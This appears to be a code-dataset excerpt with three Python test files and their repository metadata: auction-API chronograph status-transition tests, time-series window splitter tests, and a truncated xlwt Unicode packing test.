        self.assertEqual(response.json['data']["status"], "active")
        # Expire the signing period directly in the DB, then tick.
        auction = self.db.get(self.auction_id)
        auction['awards'][0]['signingPeriod']['endDate'] = auction['awards'][0]['signingPeriod']['startDate']
        self.db.save(auction)
        self.app.authorization = ('Basic', ('chronograph', ''))
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
        auction = response.json['data']
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(auction['awards'][0]['status'], 'unsuccessful')
        self.assertEqual(auction['contracts'][0]['status'], 'cancelled')
        self.assertEqual(auction['awards'][1]['status'], 'unsuccessful')
        self.assertEqual(auction['status'], 'unsuccessful')
        self.assertIn('endDate', auction['awardPeriod'])
@unittest.skip("option not available")
class AuctionLotAuctionPeriodResourceTest(AuctionAuctionPeriodResourceTest):
    """Lot-enabled variant of the auctionPeriod chronograph tests (feature disabled)."""

    initial_lots = test_lots
class AuctionComplaintSwitchResourceTest(BaseAuctionWebTest):
    """Chronograph-driven status transitions for complaints filed on the auction."""

    def _post_claim(self):
        """Submit a claim-type complaint against the auction and return its data."""
        resp = self.app.post_json('/auctions/{}/complaints'.format(self.auction_id), {'data': {
            'title': 'complaint title',
            'description': 'complaint description',
            'author': self.initial_organization,
            'status': 'claim'
        }})
        self.assertEqual(resp.status, '201 Created')
        self.assertEqual(resp.json['data']['status'], 'claim')
        return resp.json['data']

    def test_switch_to_pending(self):
        self._post_claim()
        # Backdate the submission so the claim term has already expired
        # (1 day under accelerated procurementMethodDetails, otherwise 4).
        auction_doc = self.db.get(self.auction_id)
        term = 1 if 'procurementMethodDetails' in auction_doc else 4
        auction_doc['complaints'][0]['dateSubmitted'] = (get_now() - timedelta(days=term)).isoformat()
        self.db.save(auction_doc)
        self.app.authorization = ('Basic', ('chronograph', ''))
        resp = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
        self.assertEqual(resp.status, '200 OK')
        self.assertEqual(resp.json['data']["complaints"][0]['status'], 'pending')

    def test_switch_to_complaint(self):
        for status in ['invalid', 'resolved', 'declined']:
            self.app.authorization = ('Basic', ('token', ''))
            complaint = self._post_claim()
            resp = self.app.patch_json(
                '/auctions/{}/complaints/{}?acc_token={}'.format(
                    self.auction_id, complaint['id'], self.auction_token),
                {"data": {
                    "status": "answered",
                    "resolution": status * 4,
                    "resolutionType": status
                }})
            self.assertEqual(resp.status, '200 OK')
            self.assertEqual(resp.content_type, 'application/json')
            self.assertEqual(resp.json['data']["status"], "answered")
            self.assertEqual(resp.json['data']["resolutionType"], status)
            # Backdate the answer so the escalation term has already expired.
            auction_doc = self.db.get(self.auction_id)
            term = 1 if 'procurementMethodDetails' in auction_doc else 4
            auction_doc['complaints'][-1]['dateAnswered'] = (get_now() - timedelta(days=term)).isoformat()
            self.db.save(auction_doc)
            self.app.authorization = ('Basic', ('chronograph', ''))
            resp = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
            self.assertEqual(resp.status, '200 OK')
            self.assertEqual(resp.json['data']["complaints"][-1]['status'], status)
@unittest.skip("option not available")
class AuctionLotComplaintSwitchResourceTest(AuctionComplaintSwitchResourceTest):
    """Lot-enabled variant of the complaint switch tests (feature disabled)."""

    initial_lots = test_lots
@unittest.skip("option not available")
class AuctionAwardComplaintSwitchResourceTest(BaseAuctionWebTest):
    """Chronograph-driven status transitions for complaints filed on an award (feature disabled)."""

    initial_status = 'active.qualification'
    initial_bids = test_bids

    def setUp(self):
        super(AuctionAwardComplaintSwitchResourceTest, self).setUp()
        # Create award
        resp = self.app.post_json(
            '/auctions/{}/awards'.format(self.auction_id),
            {'data': {'suppliers': [self.initial_organization], 'status': 'pending',
                      'bid_id': self.initial_bids[0]['id']}})
        self.award_id = resp.json['data']['id']

    def _post_award_claim(self):
        """Submit a claim-type complaint against the award and return its data."""
        resp = self.app.post_json(
            '/auctions/{}/awards/{}/complaints'.format(self.auction_id, self.award_id),
            {'data': {
                'title': 'complaint title',
                'description': 'complaint description',
                'author': self.initial_organization,
                'status': 'claim'
            }})
        self.assertEqual(resp.status, '201 Created')
        self.assertEqual(resp.json['data']['status'], 'claim')
        return resp.json['data']

    def _activate_award(self):
        """Move the award to the active state and verify the transition."""
        resp = self.app.patch_json(
            '/auctions/{}/awards/{}'.format(self.auction_id, self.award_id),
            {"data": {"status": "active"}})
        self.assertEqual(resp.status, '200 OK')
        self.assertEqual(resp.content_type, 'application/json')
        self.assertEqual(resp.json['data']["status"], "active")

    def test_switch_to_pending(self):
        self._post_award_claim()
        self._activate_award()
        # Backdate the submission so the claim term has already expired
        # (1 day under accelerated procurementMethodDetails, otherwise 4).
        auction_doc = self.db.get(self.auction_id)
        term = 1 if 'procurementMethodDetails' in auction_doc else 4
        auction_doc['awards'][0]['complaints'][0]['dateSubmitted'] = (get_now() - timedelta(days=term)).isoformat()
        self.db.save(auction_doc)
        self.app.authorization = ('Basic', ('chronograph', ''))
        resp = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
        self.assertEqual(resp.status, '200 OK')
        self.assertEqual(resp.json['data']['awards'][0]["complaints"][0]['status'], 'pending')

    def test_switch_to_complaint(self):
        self._activate_award()
        for status in ['invalid', 'resolved', 'declined']:
            self.app.authorization = ('Basic', ('token', ''))
            complaint = self._post_award_claim()
            resp = self.app.patch_json(
                '/auctions/{}/awards/{}/complaints/{}?acc_token={}'.format(
                    self.auction_id, self.award_id, complaint['id'], self.auction_token),
                {"data": {
                    "status": "answered",
                    "resolution": status * 4,
                    "resolutionType": status
                }})
            self.assertEqual(resp.status, '200 OK')
            self.assertEqual(resp.content_type, 'application/json')
            self.assertEqual(resp.json['data']["status"], "answered")
            self.assertEqual(resp.json['data']["resolutionType"], status)
            # Backdate the answer so the escalation term has already expired.
            auction_doc = self.db.get(self.auction_id)
            term = 1 if 'procurementMethodDetails' in auction_doc else 4
            auction_doc['awards'][0]['complaints'][-1]['dateAnswered'] = (get_now() - timedelta(days=term)).isoformat()
            self.db.save(auction_doc)
            self.app.authorization = ('Basic', ('chronograph', ''))
            resp = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
            self.assertEqual(resp.status, '200 OK')
            self.assertEqual(resp.json['data']['awards'][0]["complaints"][-1]['status'], status)
@unittest.skip("option not available")
class AuctionLotAwardComplaintSwitchResourceTest(AuctionAwardComplaintSwitchResourceTest):
    """Lot-aware variant: the created award carries a lotID (feature disabled)."""

    initial_lots = test_lots

    def setUp(self):
        # NOTE: super() is deliberately bound to the parent class itself, so the
        # parent's setUp (which creates an award without a lotID) is skipped and
        # only the grandparent BaseAuctionWebTest.setUp runs.
        super(AuctionAwardComplaintSwitchResourceTest, self).setUp()
        # Create award
        resp = self.app.post_json('/auctions/{}/awards'.format(self.auction_id), {'data': {
            'suppliers': [self.initial_organization],
            'status': 'pending',
            'bid_id': self.initial_bids[0]['id'],
            'lotID': self.initial_bids[0]['lotValues'][0]['relatedLot']
        }})
        self.award_id = resp.json['data']['id']
class AuctionDontSwitchSuspendedAuction2ResourceTest(BaseAuctionWebTest):
    """A suspended auction must not be switched to active.auction by chronograph."""

    initial_bids = test_bids

    def test_switch_suspended_auction_to_auction(self):
        # Suspend the auction as administrator.
        self.app.authorization = ('Basic', ('administrator', ''))
        self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'suspended': True}})
        self.set_status('active.auction', {'status': self.initial_status})
        # Chronograph pass: suspension blocks the switch.
        self.app.authorization = ('Basic', ('chronograph', ''))
        resp = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
        self.assertEqual(resp.status, '200 OK')
        self.assertEqual(resp.content_type, 'application/json')
        self.assertNotEqual(resp.json['data']["status"], "active.auction")
        # Lift the suspension; chronograph may now perform the switch.
        self.app.authorization = ('Basic', ('administrator', ''))
        self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'suspended': False}})
        self.app.authorization = ('Basic', ('chronograph', ''))
        resp = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
        self.assertEqual(resp.status, '200 OK')
        self.assertEqual(resp.content_type, 'application/json')
        self.assertEqual(resp.json['data']["status"], "active.auction")
class AuctionDontSwitchSuspendedAuctionResourceTest(BaseAuctionWebTest):
    """While suspended, expired award periods must not advance; after resume they do."""

    initial_status = 'active.auction'
    initial_bids = test_bids

    def setUp(self):
        super(AuctionDontSwitchSuspendedAuctionResourceTest, self).setUp()
        saved_auth = self.app.authorization
        self.app.authorization = ('Basic', ('auction', ''))
        now = get_now()
        # Post auction results: each bid gets a slightly earlier date than the previous.
        posted_bids = {
            'bids': [
                {
                    "id": b['id'],
                    "date": (now - timedelta(seconds=i)).isoformat(),
                    "value": b['value']
                }
                for i, b in enumerate(self.initial_bids)
            ]
        }
        resp = self.app.post_json('/auctions/{}/auction'.format(self.auction_id), {'data': posted_bids})
        self.assertEqual(resp.status, '200 OK')
        self.assertEqual(resp.content_type, 'application/json')
        auction = resp.json['data']
        self.assertEqual('active.qualification', auction["status"])
        self.award = self.first_award = auction['awards'][0]
        self.second_award = auction['awards'][1]
        self.award_id = self.first_award_id = self.first_award['id']
        self.second_award_id = self.second_award['id']
        self.app.authorization = saved_auth

    def _expire_first_award_period(self, period):
        """Collapse the named period of the first award so it is already over."""
        doc = self.db.get(self.auction_id)
        doc['awards'][0][period]['endDate'] = doc['awards'][0][period]['startDate']
        self.db.save(doc)

    def _set_suspended(self, suspended):
        """Toggle the auction's suspended flag as the administrator."""
        self.app.authorization = ('Basic', ('administrator', ''))
        self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'suspended': suspended}})

    def _chronograph_tick(self):
        """Trigger a chronograph pass and return the refreshed auction data."""
        self.app.authorization = ('Basic', ('chronograph', ''))
        resp = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
        self.assertEqual(resp.status, '200 OK')
        return resp.json['data']

    def _move_first_award_to_payment(self):
        """Upload the auction protocol and move the first award to pending.payment."""
        bid_token = self.initial_bids_tokens[self.award['bid_id']]  # kept for parity with original flow
        resp = self.app.post('/auctions/{}/awards/{}/documents?acc_token={}'.format(
            self.auction_id, self.award_id, self.auction_token),
            upload_files=[('file', 'auction_protocol.pdf', 'content')])
        self.assertEqual(resp.status, '201 Created')
        self.assertEqual(resp.content_type, 'application/json')
        doc_id = resp.json["data"]['id']
        key = resp.json["data"]["url"].split('?')[-1]  # unused, kept for parity
        resp = self.app.patch_json(
            '/auctions/{}/awards/{}/documents/{}?acc_token={}'.format(
                self.auction_id, self.award_id, doc_id, self.auction_token),
            {"data": {
                "description": "auction protocol",
                "documentType": 'auctionProtocol'
            }})
        self.assertEqual(resp.status, '200 OK')
        self.assertEqual(resp.content_type, 'application/json')
        self.assertEqual(resp.json["data"]["documentType"], 'auctionProtocol')
        resp = self.app.patch_json(
            '/auctions/{}/awards/{}'.format(self.auction_id, self.award_id),
            {"data": {"status": "pending.payment"}})
        self.assertEqual(resp.status, '200 OK')
        self.assertEqual(resp.content_type, 'application/json')
        self.assertEqual(resp.json['data']["status"], "pending.payment")

    def test_switch_suspended_verification_to_unsuccessful(self):
        self._expire_first_award_period('verificationPeriod')
        self._set_suspended(True)
        auction = self._chronograph_tick()
        # While suspended the expired award must stay untouched.
        self.assertEqual(auction['awards'][0]['status'], 'pending.verification')
        self.assertEqual(auction['awards'][1]['status'], 'pending.waiting')
        self._set_suspended(False)
        auction = self._chronograph_tick()
        # After resume the expired award fails and the next one is promoted.
        self.assertEqual(auction['awards'][0]['status'], 'unsuccessful')
        self.assertEqual(auction['awards'][1]['status'], 'pending.verification')
        self.assertEqual(auction['status'], 'active.qualification')
        self.assertNotIn('endDate', auction['awardPeriod'])

    def test_switch_suspended_payment_to_unsuccessful(self):
        self._move_first_award_to_payment()
        self._expire_first_award_period('paymentPeriod')
        self._set_suspended(True)
        auction = self._chronograph_tick()
        # While suspended the expired award must stay untouched.
        self.assertEqual(auction['awards'][0]['status'], 'pending.payment')
        self.assertEqual(auction['awards'][1]['status'], 'pending.waiting')
        self._set_suspended(False)
        auction = self._chronograph_tick()
        self.assertEqual(auction['awards'][0]['status'], 'unsuccessful')
        self.assertEqual(auction['awards'][1]['status'], 'pending.verification')
        self.assertEqual(auction['status'], 'active.qualification')
        self.assertNotIn('endDate', auction['awardPeriod'])

    def test_switch_suspended_active_to_unsuccessful(self):
        self._move_first_award_to_payment()
        resp = self.app.patch_json(
            '/auctions/{}/awards/{}'.format(self.auction_id, self.award_id),
            {"data": {"status": "active"}})
        self.assertEqual(resp.status, '200 OK')
        self.assertEqual(resp.content_type, 'application/json')
        self.assertEqual(resp.json['data']["status"], "active")
        self._expire_first_award_period('signingPeriod')
        self._set_suspended(True)
        auction = self._chronograph_tick()
        # While suspended the award, its contract and the auction stay as-is.
        self.assertEqual(auction['awards'][0]['status'], 'active')
        self.assertEqual(auction['contracts'][0]['status'], 'pending')
        self.assertEqual(auction['awards'][1]['status'], 'pending.waiting')
        self.assertEqual(auction['status'], 'active.awarded')
        self.assertIn('endDate', auction['awardPeriod'])
        self._set_suspended(False)
        auction = self._chronograph_tick()
        self.assertEqual(auction['awards'][0]['status'], 'unsuccessful')
        self.assertEqual(auction['contracts'][0]['status'], 'cancelled')
        self.assertEqual(auction['awards'][1]['status'], 'pending.verification')
        self.assertEqual(auction['status'], 'active.qualification')
        self.assertNotIn('endDate', auction['awardPeriod'])
class FinancialAuctionSwitchQualificationResourceTest(AuctionSwitchQualificationResourceTest):
    """Financial-auction variant of the qualification switch tests."""

    initial_bids = test_financial_bids[:1]
    initial_data = test_financial_auction_data
    initial_organization = test_financial_organization
class FinancialAuctionSwitchAuctionResourceTest(AuctionSwitchAuctionResourceTest):
    """Financial-auction variant of the auction switch tests."""

    initial_bids = test_financial_bids
    initial_data = test_financial_auction_data
    initial_organization = test_financial_organization
class FinancialAuctionSwitchUnsuccessfulResourceTest(AuctionSwitchUnsuccessfulResourceTest):
    """Financial-auction variant of the unsuccessful switch tests."""

    initial_data = test_financial_auction_data
    initial_organization = test_financial_organization
@unittest.skip("option not available")
class FinancialAuctionLotSwitchQualificationResourceTest(AuctionLotSwitchQualificationResourceTest):
    """Financial lot variant of the qualification switch tests (feature disabled)."""

    initial_data = test_financial_auction_data
    initial_organization = test_financial_organization
@unittest.skip("option not available")
class FinancialAuctionLotSwitchAuctionResourceTest(AuctionLotSwitchAuctionResourceTest):
    """Financial lot variant of the auction switch tests (feature disabled)."""

    initial_data = test_financial_auction_data
    initial_organization = test_financial_organization
@unittest.skip("option not available")
class FinancialAuctionLotSwitchUnsuccessfulResourceTest(AuctionLotSwitchUnsuccessfulResourceTest):
    """Financial lot variant of the unsuccessful switch tests (feature disabled)."""

    initial_data = test_financial_auction_data
    initial_organization = test_financial_organization
class FinancialAuctionAuctionPeriodResourceTest(AuctionAuctionPeriodResourceTest):
    """Financial-auction variant of the auctionPeriod chronograph tests."""

    initial_bids = test_financial_bids
    initial_data = test_financial_auction_data
    initial_organization = test_financial_organization
@unittest.skip("option not available")
class FinancialAuctionLotAuctionPeriodResourceTest(AuctionLotAuctionPeriodResourceTest):
    """Financial lot variant of the auctionPeriod tests (feature disabled)."""

    initial_data = test_financial_auction_data
    initial_organization = test_financial_organization
class FinancialAuctionComplaintSwitchResourceTest(AuctionComplaintSwitchResourceTest):
    """Financial-auction variant of the complaint switch tests."""

    initial_data = test_financial_auction_data
    initial_organization = test_financial_organization
@unittest.skip("option not available")
class FinancialAuctionLotComplaintSwitchResourceTest(AuctionLotComplaintSwitchResourceTest):
    """Financial lot variant of the complaint switch tests (feature disabled)."""

    initial_data = test_financial_auction_data
    initial_organization = test_financial_organization
@unittest.skip("option not available")
class FinancialAuctionAwardComplaintSwitchResourceTest(AuctionAwardComplaintSwitchResourceTest):
    """Financial-auction variant of the award complaint switch tests (feature disabled)."""

    initial_bids = test_financial_bids
    initial_data = test_financial_auction_data
    initial_organization = test_financial_organization
@unittest.skip("option not available")
class FinancialAuctionLotAwardComplaintSwitchResourceTest(AuctionLotAwardComplaintSwitchResourceTest):
    """Financial lot variant of the award complaint switch tests (feature disabled)."""

    initial_data = test_financial_auction_data
    initial_organization = test_financial_organization
def suite():
    """Assemble this module's test suite (cases added in the original order)."""
    tests = unittest.TestSuite()
    for case in (
        AuctionAwardComplaintSwitchResourceTest,
        AuctionComplaintSwitchResourceTest,
        AuctionLotAwardComplaintSwitchResourceTest,
        AuctionLotComplaintSwitchResourceTest,
        AuctionLotSwitchAuctionResourceTest,
        AuctionLotSwitchQualificationResourceTest,
        AuctionLotSwitchUnsuccessfulResourceTest,
        AuctionSwitchAuctionResourceTest,
        AuctionSwitchQualificationResourceTest,
        AuctionSwitchUnsuccessfulResourceTest,
        FinancialAuctionAwardComplaintSwitchResourceTest,
        FinancialAuctionComplaintSwitchResourceTest,
        FinancialAuctionLotAwardComplaintSwitchResourceTest,
        FinancialAuctionLotComplaintSwitchResourceTest,
        FinancialAuctionLotSwitchAuctionResourceTest,
        FinancialAuctionLotSwitchQualificationResourceTest,
        FinancialAuctionLotSwitchUnsuccessfulResourceTest,
        FinancialAuctionSwitchAuctionResourceTest,
        FinancialAuctionSwitchQualificationResourceTest,
        FinancialAuctionSwitchUnsuccessfulResourceTest,
    ):
        tests.addTest(unittest.makeSuite(case))
    return tests
# Allow running this module directly; execute the suite() defined above.
if __name__ == '__main__':
    unittest.main(defaultTest='suite')
| 54.313466
| 194
| 0.661193
| 5,059
| 49,208
| 6.303815
| 0.039534
| 0.091248
| 0.108181
| 0.048258
| 0.856637
| 0.846602
| 0.841617
| 0.829576
| 0.822081
| 0.809821
| 0
| 0.01356
| 0.171212
| 49,208
| 905
| 195
| 54.373481
| 0.768408
| 0.000955
| 0
| 0.808
| 0
| 0
| 0.216246
| 0.024249
| 0
| 0
| 0
| 0
| 0.310667
| 1
| 0.033333
| false
| 0
| 0.005333
| 0
| 0.138667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
90f19b5ac44e535e444277cc315deb13a44860e6
| 2,717
|
py
|
Python
|
tests/test_splitter.py
|
chris-santiago/tsfeast
|
a4177ecd23d2c55fd959f8d4cd011a15f5c57da6
|
[
"MIT"
] | null | null | null |
tests/test_splitter.py
|
chris-santiago/tsfeast
|
a4177ecd23d2c55fd959f8d4cd011a15f5c57da6
|
[
"MIT"
] | 7
|
2021-08-04T18:10:55.000Z
|
2021-08-21T20:36:59.000Z
|
tests/test_splitter.py
|
chris-santiago/tsfeast
|
a4177ecd23d2c55fd959f8d4cd011a15f5c57da6
|
[
"MIT"
] | 2
|
2021-08-11T05:58:46.000Z
|
2021-12-17T22:09:59.000Z
|
import numpy as np
import pandas as pd
import pytest
from tsfeast.splitter import EndogSeriesWindows, TimeSeriesWindows
class TestTimeSeriesWindows:
    """Behavioural tests for TimeSeriesWindows train/test window splitting."""

    def test_split_sets(self, endog_uni, exog):
        """Every window is a 4-tuple: x_train, x_test, y_train, y_test."""
        windows = TimeSeriesWindows(train_length=3, test_length=1, gap_length=0).split(endog_uni, exog)
        for window in windows:
            assert len(window) == 4

    @pytest.mark.parametrize(
        'train_length, test_length',
        [(2, 1), (3, 1), (3, 2)],
    )
    def test_num_splits(self, endog_uni, exog, train_length, test_length):
        """Window count with no gap: n - train_length - (test_length - 1)."""
        splitter = TimeSeriesWindows(train_length=train_length, test_length=test_length, gap_length=0)
        expected = len(endog_uni) - train_length - (test_length - 1)
        assert len(splitter.split(endog_uni, exog)) == expected

    @pytest.mark.parametrize(
        'train_length, test_length, gap_length',
        [(2, 1, 1), (3, 1, 2), (3, 2, 1)],
    )
    def test_gap_n_splits(self, endog_uni, exog, train_length, test_length, gap_length):
        """The gap reduces the window count by gap_length."""
        splitter = TimeSeriesWindows(train_length=train_length, test_length=test_length, gap_length=gap_length)
        expected = len(endog_uni) - (train_length + gap_length) - (test_length - 1)
        assert len(splitter.split(endog_uni, exog)) == expected

    @pytest.mark.parametrize(
        'train_length, test_length, gap_length',
        [(2, 1, 1), (3, 1, 2), (3, 2, 0)],
    )
    def test_split_shape(self, endog_uni, exog, train_length, test_length, gap_length):
        """Each split's train/test pieces have the requested number of rows."""
        splitter = TimeSeriesWindows(train_length=train_length, test_length=test_length, gap_length=gap_length)
        for x_train, x_test, y_train, y_test in splitter.split(endog_uni, exog):
            assert x_train.shape[0] == train_length
            assert x_test.shape[0] == test_length
            assert y_train.shape[0] == train_length
            assert y_test.shape[0] == test_length

    @pytest.mark.parametrize(
        'train_length, test_length, gap_length',
        [(2, 1, 1), (3, 1, 2), (3, 2, 0)],
    )
    def test_gap_exists(self, endog_uni, exog, train_length, test_length, gap_length):
        """Train end and test start are separated by gap_length month-ends (monthly index)."""
        splitter = TimeSeriesWindows(train_length=train_length, test_length=test_length, gap_length=gap_length)
        offset = pd.tseries.offsets.MonthEnd(1 + gap_length)
        for x_train, x_test, y_train, y_test in splitter.split(endog_uni, exog):
            assert x_train.index[-1] + offset == x_test.index[0]
            assert y_train.index[-1] + offset == y_test.index[0]
| 38.814286
| 106
| 0.620169
| 362
| 2,717
| 4.383978
| 0.138122
| 0.145558
| 0.181474
| 0.172023
| 0.802773
| 0.777568
| 0.745432
| 0.717076
| 0.717076
| 0.666037
| 0
| 0.025138
| 0.267943
| 2,717
| 69
| 107
| 39.376812
| 0.77275
| 0
| 0
| 0.435484
| 0
| 0
| 0.050055
| 0
| 0
| 0
| 0
| 0
| 0.145161
| 1
| 0.080645
| false
| 0
| 0.064516
| 0
| 0.16129
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2928962c75bf68a1bae5cdcfe71fdcaf1fd24069
| 4,930
|
py
|
Python
|
desktop/core/ext-py/xlwt-1.3.0/tests/test_unicodeutils.py
|
zhoudahong/hue
|
9ec1b48e6abf08e81b74fa5fc4a03770e37aff92
|
[
"Apache-2.0"
] | 5,079
|
2015-01-01T03:39:46.000Z
|
2022-03-31T07:38:22.000Z
|
desktop/core/ext-py/xlwt-1.3.0/tests/test_unicodeutils.py
|
zhoudahong/hue
|
9ec1b48e6abf08e81b74fa5fc4a03770e37aff92
|
[
"Apache-2.0"
] | 1,623
|
2015-01-01T08:06:24.000Z
|
2022-03-30T19:48:52.000Z
|
desktop/core/ext-py/xlwt-1.3.0/tests/test_unicodeutils.py
|
zhoudahong/hue
|
9ec1b48e6abf08e81b74fa5fc4a03770e37aff92
|
[
"Apache-2.0"
] | 2,033
|
2015-01-04T07:18:02.000Z
|
2022-03-28T19:55:47.000Z
|
# coding:utf-8
import sys
import unittest
from xlwt.UnicodeUtils import upack1, upack2, upack2rt
class TestUpack(unittest.TestCase):
"""Byte-level tests for xlwt.UnicodeUtils string packing (upack1/upack2/upack2rt)."""
def test_upack1(self):
# upack1: expected bytes start with a 1-byte count (0x1d == 29 chars) and a
# 0x00 flag byte, followed by the (apparently latin-1) payload.
result = b'\x1d\x00abcdefghijklmnopqrstuvwxyz\xd6\xc4\xdc'
ustr = upack1(u"abcdefghijklmnopqrstuvwxyzÖÄÜ")
self.assertEqual(ustr, result)
def test_upack2_ascii(self):
# upack2: same payload but a 2-byte little-endian count (\x1d\x00) + flag byte.
result = b'\x1d\x00\x00abcdefghijklmnopqrstuvwxyz\xd6\xc4\xdc'
ustr = upack2(u"abcdefghijklmnopqrstuvwxyzÖÄÜ")
self.assertEqual(ustr, result)
def test_upack2_latin1(self):
# Explicit latin1 encoding must produce the same bytes as the default above.
result = b'\x1d\x00\x00abcdefghijklmnopqrstuvwxyz\xd6\xc4\xdc'
ustr = upack2(u"abcdefghijklmnopqrstuvwxyzÖÄÜ", encoding='latin1')
self.assertEqual(ustr, result)
def test_upack2_cp1251(self):
# Under cp1251 the trailing three characters map to \xce\xeb\xff instead.
result = b'\x1d\x00\x00abcdefghijklmnopqrstuvwxyz\xce\xeb\xff'
ustr = upack2(u"abcdefghijklmnopqrstuvwxyz\xce\xeb\xff", encoding='cp1251')
self.assertEqual(ustr, result)
def test_unicode(self):
# Python 2/3 compatibility shim: unichr only exists on Python 2 (never
# evaluated on Python 3, so the bare name is safe there).
chr_ = chr if (sys.version_info[0] >= 3) else unichr
# Expected packing of code points 0..0x1FF: 2-byte count (\x00\x02 == 0x0200),
# then a 0x01 flag byte (presumably "16-bit characters" — TODO confirm against
# UnicodeUtils), then each code point as little-endian 16-bit.
result = b'\x00\x02\x01\x00\x00\x01\x00\x02\x00\x03\x00\x04\x00\x05\x00\x06\x00\x07\x00\x08\x00\t\x00\n\x00\x0b\x00\x0c\x00\r\x00\x0e\x00\x0f\x00\x10\x00\x11\x00\x12\x00\x13\x00\x14\x00\x15\x00\x16\x00\x17\x00\x18\x00\x19\x00\x1a\x00\x1b\x00\x1c\x00\x1d\x00\x1e\x00\x1f\x00 \x00!\x00"\x00#\x00$\x00%\x00&\x00\'\x00(\x00)\x00*\x00+\x00,\x00-\x00.\x00/\x000\x001\x002\x003\x004\x005\x006\x007\x008\x009\x00:\x00;\x00<\x00=\x00>\x00?\x00@\x00A\x00B\x00C\x00D\x00E\x00F\x00G\x00H\x00I\x00J\x00K\x00L\x00M\x00N\x00O\x00P\x00Q\x00R\x00S\x00T\x00U\x00V\x00W\x00X\x00Y\x00Z\x00[\x00\\\x00]\x00^\x00_\x00`\x00a\x00b\x00c\x00d\x00e\x00f\x00g\x00h\x00i\x00j\x00k\x00l\x00m\x00n\x00o\x00p\x00q\x00r\x00s\x00t\x00u\x00v\x00w\x00x\x00y\x00z\x00{\x00|\x00}\x00~\x00\x7f\x00\x80\x00\x81\x00\x82\x00\x83\x00\x84\x00\x85\x00\x86\x00\x87\x00\x88\x00\x89\x00\x8a\x00\x8b\x00\x8c\x00\x8d\x00\x8e\x00\x8f\x00\x90\x00\x91\x00\x92\x00\x93\x00\x94\x00\x95\x00\x96\x00\x97\x00\x98\x00\x99\x00\x9a\x00\x9b\x00\x9c\x00\x9d\x00\x9e\x00\x9f\x00\xa0\x00\xa1\x00\xa2\x00\xa3\x00\xa4\x00\xa5\x00\xa6\x00\xa7\x00\xa8\x00\xa9\x00\xaa\x00\xab\x00\xac\x00\xad\x00\xae\x00\xaf\x00\xb0\x00\xb1\x00\xb2\x00\xb3\x00\xb4\x00\xb5\x00\xb6\x00\xb7\x00\xb8\x00\xb9\x00\xba\x00\xbb\x00\xbc\x00\xbd\x00\xbe\x00\xbf\x00\xc0\x00\xc1\x00\xc2\x00\xc3\x00\xc4\x00\xc5\x00\xc6\x00\xc7\x00\xc8\x00\xc9\x00\xca\x00\xcb\x00\xcc\x00\xcd\x00\xce\x00\xcf\x00\xd0\x00\xd1\x00\xd2\x00\xd3\x00\xd4\x00\xd5\x00\xd6\x00\xd7\x00\xd8\x00\xd9\x00\xda\x00\xdb\x00\xdc\x00\xdd\x00\xde\x00\xdf\x00\xe0\x00\xe1\x00\xe2\x00\xe3\x00\xe4\x00\xe5\x00\xe6\x00\xe7\x00\xe8\x00\xe9\x00\xea\x00\xeb\x00\xec\x00\xed\x00\xee\x00\xef\x00\xf0\x00\xf1\x00\xf2\x00\xf3\x00\xf4\x00\xf5\x00\xf6\x00\xf7\x00\xf8\x00\xf9\x00\xfa\x00\xfb\x00\xfc\x00\xfd\x00\xfe\x00\xff\x00\x00\x01\x01\x01\x02\x01\x03\x01\x04\x01\x05\x01\x06\x01\x07\x01\x08\x01\t\x01\n\x01\x0b\x01\x0c\x01\r\x01\x0e\x01\x0f\x01\x10\x01\x11\x01\x12\x01\x13\x01\x14\x01\x15\x01\x16\x01\x17\x01\x18\x01\x19\x01\x1a\x01\x1b\x01
